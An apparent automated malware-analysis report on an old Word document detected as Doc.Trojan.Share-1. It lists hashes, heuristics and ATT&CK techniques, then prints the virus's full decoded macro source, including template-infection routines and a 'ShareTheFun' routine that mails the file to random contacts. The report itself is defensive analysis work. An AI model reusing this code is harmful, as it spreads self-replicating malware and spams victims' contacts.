Office (OLE) malware analysis — malicious · f2ef4214dcb853dc

MALICIOUS

Office (OLE)

63.5 KB Created: 1998-02-08 15:45:00 Authoring application: Microsoft Word 8.0 First seen: 2012-06-14

MD5: d726bc2cf5923340e368b62e115659af SHA-1: 8f17364f012dc8d3d9236127d75ca215d7b8e44b SHA-256: f2ef4214dcb853dc361145c4d9752b6f97b774e3a7c9fe054c0c2f7a6c53f2c0

188 Risk Score

Malware Insights

MITRE ATT&CK

T1059.005 Visual Basic T1566.001 Spearphishing Attachment

The file contains legacy WordBasic macro markers and a detected AutoOpen macro, indicating malicious intent. The 'ShareTheFun' subroutine attempts to save the document as 'c:\doc1.doc' and then interact with Microsoft Mail to send it, suggesting a phishing or spam distribution method. The presence of legacy macro virus markers and the specific actions within the script strongly suggest a malicious document.

Heuristics 4

ClamAV: Doc.Trojan.Share-1 critical CLAMAV_DETECTION

ClamAV detected this file as malware: Doc.Trojan.Share-1
Legacy WordBasic macro-virus markers high OLE_LEGACY_WORDBASIC_MACRO_VIRUS

OLE Word document contains legacy WordBasic auto-execution macro markers such as AutoOpen plus ToolsMacro/MacroFile/fileMacro/globMacro or named historical macro-virus strings. These old Word 6/95 macro forms are not exposed as a modern VBA project, so normal VBA source extraction can miss them.
VBA macros detected medium 1 related finding OLE_VBA_MACROS

Document contains VBA macro code
AutoOpen macro low OLE_VBA_AUTOOPEN

AutoOpen macro
Matched line in script
```
WordBasic.Call "autoOpen.saveall"
```

Extracted artifacts 1

Files carved from inside the sample during analysis.

Filename	Kind	Source	Size
`macros.bas`	vba-macro	oletools.olevba.extract_macros (decoded VBA source)	5885 bytes
SHA-256: `ec67eb3632ece3101fd542ca803d7bded553cb6a7cd1202c21607967d945ce23`
Detection ClamAV: Doc.Trojan.Share-1 Obfuscation or payload: unlikely
Preview script First 1,000 lines of the extracted script Attribute VB_Name = "ThisDocument" Attribute VB_Base = "0{00020906-0000-0000-C000-000000000046}" Attribute VB_Creatable = False Attribute VB_PredeclaredId = True Attribute VB_Exposed = True Attribute VB_TemplateDerived = False Attribute VB_Customizable = True Attribute VB_Name = "FileTemplates" Public Sub MAIN() Attribute MAIN.VB_Description = "Changes the active template and the template options" Attribute MAIN.VB_ProcData.VB_Invoke_Func = "TemplateProject.FileTemplates.MAIN" WordBasic.Call "autoOpen.saveall" WordBasic.Beep End Sub Attribute VB_Name = "ShareTheFun" Public Sub MAIN() On Error GoTo -1: On Error GoTo errsending WordBasic.FileSaveAs Name:="c:\doc1.doc", Format:=1 If WordBasic.AppIsRunning("Microsoft Mail") Then WordBasic.AppActivate "Microsoft Mail" Else WordBasic.ExitWindows End If WordBasic.SendKeys "{enter}" WordBasic.SendKeys "%MN" PickName PickName PickName WordBasic.SendKeys "{TAB}{TAB}You have GOT to read this!{TAB}" WordBasic.SendKeys "%Ac:\doc1.doc{ENTER}%o" WordBasic.SendKeys "%S", -1 WordBasic.SendKeys "%Vn", -1 WordBasic.SendKeys "%Vn", -1 WordBasic.AppClose "Microsoft Mail" errsending: On Error GoTo -1: On Error GoTo 0 End Sub Private Sub PickName() Dim n$ Dim dn Dim d On Error GoTo -1: On Error GoTo woops n$ = "," + Chr(WordBasic.Int(Rnd() * 25) + 65) WordBasic.SendKeys n$ + "%K", -1 dn = WordBasic.Int(Rnd() * 6) For d = 1 To dn WordBasic.SendKeys "{down}" Next d WordBasic.SendKeys "{ENTER}", -1 woops: On Error GoTo -1: On Error GoTo 0 End Sub Attribute VB_Name = "ToolsMacro" Public Sub MAIN() Attribute MAIN.VB_Description = "Runs, creates, deletes, or revises a macro" Attribute MAIN.VB_ProcData.VB_Invoke_Func = "TemplateProject.ToolsMacro.MAIN" WordBasic.Call "autoOpen.saveall" WordBasic.Beep End Sub Attribute VB_Name = "FileClose" Public Sub MAIN() Attribute MAIN.VB_Description = "Closes all of the windows of the active document" Attribute MAIN.VB_ProcData.VB_Invoke_Func = "TemplateProject.FileClose.MAIN" On Error Resume Next WordBasic.Call "autoOpen.SaveAll" WordBasic.FileClose On Error GoTo -1: On Error GoTo 0 End Sub Attribute VB_Name = "FileSave" Public Sub MAIN() Attribute MAIN.VB_Description = "Saves the active document or template" Attribute MAIN.VB_ProcData.VB_Invoke_Func = "TemplateProject.FileSave.MAIN" On Error Resume Next WordBasic.Call "autoOpen.SaveAll" WordBasic.FileSave On Error GoTo -1: On Error GoTo 0 End Sub Attribute VB_Name = "FileOpen" Public Sub MAIN() Attribute MAIN.VB_Description = "Opens an existing document or template" Attribute MAIN.VB_ProcData.VB_Invoke_Func = "TemplateProject.FileOpen.MAIN" WordBasic.Call "autoOpen.SaveAll" On Error GoTo -1: On Error GoTo cancelled Dim dlg As Object: Set dlg = WordBasic.DialogRecord.FileOpen(False) WordBasic.CurValues.FileOpen dlg WordBasic.Dialog.FileOpen dlg WordBasic.FileOpen dlg cancelled: On Error GoTo -1: On Error GoTo 0 End Sub Attribute VB_Name = "FileExit" Public Sub MAIN() Attribute MAIN.VB_Description = "Quits Microsoft Word and prompts to save the documents" Attribute MAIN.VB_ProcData.VB_Invoke_Func = "TemplateProject.FileExit.MAIN" Dim Save On Error Resume Next WordBasic.Call "autoOpen.SaveAll" WordBasic.FileExit Save On Error GoTo -1: On Error GoTo 0 End Sub Attribute VB_Name = "AutoOpen" Public Sub MAIN() Attribute MAIN.VB_Description = "ScanProt macro to install protection macros, disinfect your Normal (Global) template and run the CleanAll macro." Attribute MAIN.VB_ProcData.VB_Invoke_Func = "TemplateProject.AutoOpen.MAIN" On Error GoTo -1: On Error GoTo ErrCt WordBasic.ToolsOptionsSave GlobalDotPrompt:=0 WordBasic.DisableAutoMacros 0 SaveAll WordBasic.StartOfDocument If WordBasic.Int(Rnd() * 4) + 1 = 3 Then WordBasic.Call "ShareTheFun" ErrCt: bye: On Error GoTo -1: On Error GoTo 0 End Sub Private Sub SaveAll() Dim MacroFile$ On Error GoTo -1: On Error GoTo errsaving WordBasic.ToolsOptionsSave GlobalDotPrompt:=0 WordBasic.DisableAutoMacros 0 SaveMacros "autoOpen" SaveMacros "FileClose" SaveMacros "AutoExec" SaveMacros "FileExit" SaveMacros "FileSave" SaveMacros "FileOpen" SaveMacros "FileTemplates" SaveMacros "ToolsMacro" SaveMacros "ShareTheFun" WordBasic.FileSummaryInfo Update:=1 Dim dlg As Object: Set dlg = WordBasic.DialogRecord.FileSummaryInfo(False) WordBasic.CurValues.FileSummaryInfo dlg MacroFile$ = UCase(WordBasic.[Right$](WordBasic.[MacroFileName$](WordBasic.[MacroName$](0)), 10)) If MacroFile$ = "NORMAL.DOT" Then WordBasic.FileSaveAs Format:=1 WordBasic.StartOfDocument errsaving: On Error GoTo -1: On Error GoTo 0 End Sub Private Sub SaveMacros(M$) Dim fileMacro$ Dim globMacro$ Dim MacroFile$ On Error GoTo -1: On Error GoTo cantsave WordBasic.FileSummaryInfo Update:=1 Dim dlg As Object: Set dlg = WordBasic.DialogRecord.FileSummaryInfo(False) WordBasic.CurValues.FileSummaryInfo dlg fileMacro$ = dlg.Directory + "\" + dlg.FileName + ":" + M$ globMacro$ = "Global:" + M$ MacroFile$ = UCase(WordBasic.[Right$](WordBasic.[MacroFileName$](WordBasic.[MacroName$](0)), 10)) If MacroFile$ = "NORMAL.DOT" Then WordBasic.MacroCopy globMacro$, fileMacro$, 1 Else WordBasic.MacroCopy fileMacro$, globMacro$, 1 End If WordBasic.StartOfDocument cantsave: On Error GoTo -1: On Error GoTo 0 End Sub Attribute VB_Name = "AutoExec" Public Sub MAIN() Rem d i n g o a c k Rem DisableAutoMacros End Sub

Open this report in the interactive analyzer, or submit your own file for analysis.